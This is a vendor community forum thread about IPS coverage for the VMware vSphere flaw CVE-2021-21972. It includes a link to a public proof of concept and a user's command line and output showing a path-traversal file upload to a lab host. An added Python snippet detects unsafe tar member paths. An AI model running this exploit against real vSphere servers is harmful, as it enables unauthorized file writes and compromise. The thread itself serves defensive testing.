erondicarvalho
Explorer

Does Check Point have CVE-2021-21972 IPS protection?

 

Hello 

I have updated IPS on management but I cannot find CVE-2021-21972 signature.

Does Check Point have CVE-2021-21972 IPS protection?

Does Check Point have a plan to release this signature?

 

Thank you.

0 Kudos
5 Replies
_Val_
Admin

The vulnerability was announced yesterday. Until there is a proof of concept or a working exploit, an IPS signature cannot be produced. VMware has posted a workaround here that you can apply meanwhile.


Sigbjorn
Advisor

This exploit is in the wild now.

Proof of concept available on GitHub: https://github.com/horizon3ai/CVE-2021-21972

Any updates on IPS signatures?

 

 

0 Kudos
Avi_Bechor
Employee

Hi,

An IPS protection was released for this vulnerability.
Protection name: "VMware vSphere Client Remote Code Execution (CVE-2021-21972)"

Thanks,
Avi


Sigbjorn
Advisor

I don't seem to have any luck triggering this protection.

Testing at home:

Check Point 3100 - R80.40 JHA91
[Expert@cp-fw01:0]# ips stat
IPS Status: Enabled
Active Profiles:
Custom Optimized
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

Second test:

VSX R80.30 JHA 227 (Open server)

[Expert@<vsxhostname>:<vsid>]# ips stat
IPS Status: Enabled
IPS Update Version: 635211403
Global Detect: Off
Bypass Under Load: Off

 

In the test, I'm just running the PoC code from GitHub.

x@y:~/CVE-2021-21972$ python3 poc.py -t 10.99.9.9 -f testfile.txt -p /home/vsphere-ui/testfile.txt -o unix
[+] 10.99.9.9 vulnerable to CVE-2021-21972!
[+] Adding testfile.txt as ../../../../../home/vsphere-ui/testfile.txt to archive
[+] Wrote testfile.txt to exploit.tar on local filesystem
[+] File uploaded successfully

 

root@photon-machine [ ~ ]# cd /home/vsphere-ui/
root@photon-machine [ /home/vsphere-ui ]# ls
testfile.txt
root@photon-machine [ /home/vsphere-ui ]# cat testfile.txt
test
root@photon-machine [ /home/vsphere-ui ]#

 

 

0 Kudos
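
The PoC output in the post above shows the uploaded archive carrying a member named `../../../../../home/vsphere-ui/testfile.txt`. As an added example (not part of the thread, and not Check Point's or VMware's code), this Python check lists tar members that would resolve outside an extraction directory, a host-side control that does not depend on the IPS signature firing; the function names, the `/extract` directory and the sample archive are constructed for the example.

```python
import io
import posixpath
import tarfile


def _inside(root, path):
    """True if the normalised absolute path stays under root."""
    return posixpath.commonpath([root, posixpath.normpath(path)]) == root


def unsafe_members(tar_bytes, dest="/extract"):
    """Return (member name, reason) for entries that would land outside dest.

    dest is assumed to be an absolute, normalised directory path.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tar:
        for m in tar.getmembers():
            target = posixpath.join(dest, m.name)
            if not _inside(dest, target):
                findings.append((m.name, "path escapes extraction directory"))
            elif m.issym() or m.islnk():
                # Symlink targets are relative to the link's own directory,
                # hard-link targets to the archive root.
                base = posixpath.dirname(target) if m.issym() else dest
                if not _inside(dest, posixpath.join(base, m.linkname)):
                    findings.append((m.name, "link target escapes extraction directory"))
    return findings


def build_sample():
    """Constructed sample: an ordinary file, the member name printed in the
    PoC output quoted in the thread, and a symlink pointing out of the tree."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name in ("docs/readme.txt",
                     "../../../../../home/vsphere-ui/testfile.txt"):
            info = tarfile.TarInfo(name=name)
            info.size = 5
            tar.addfile(info, io.BytesIO(b"test\n"))
        link = tarfile.TarInfo(name="logs/current")
        link.type = tarfile.SYMTYPE
        link.linkname = "../../etc"
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in unsafe_members(build_sample()):
        print(f"{reason}: {name}")
```
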
Avi_Bechor
Employee

Hi,

The PoC you shared is blocked based on our internal testing. I am taking this with you offline to ensure that you configured the testing correctly.

Avi

0 Kudos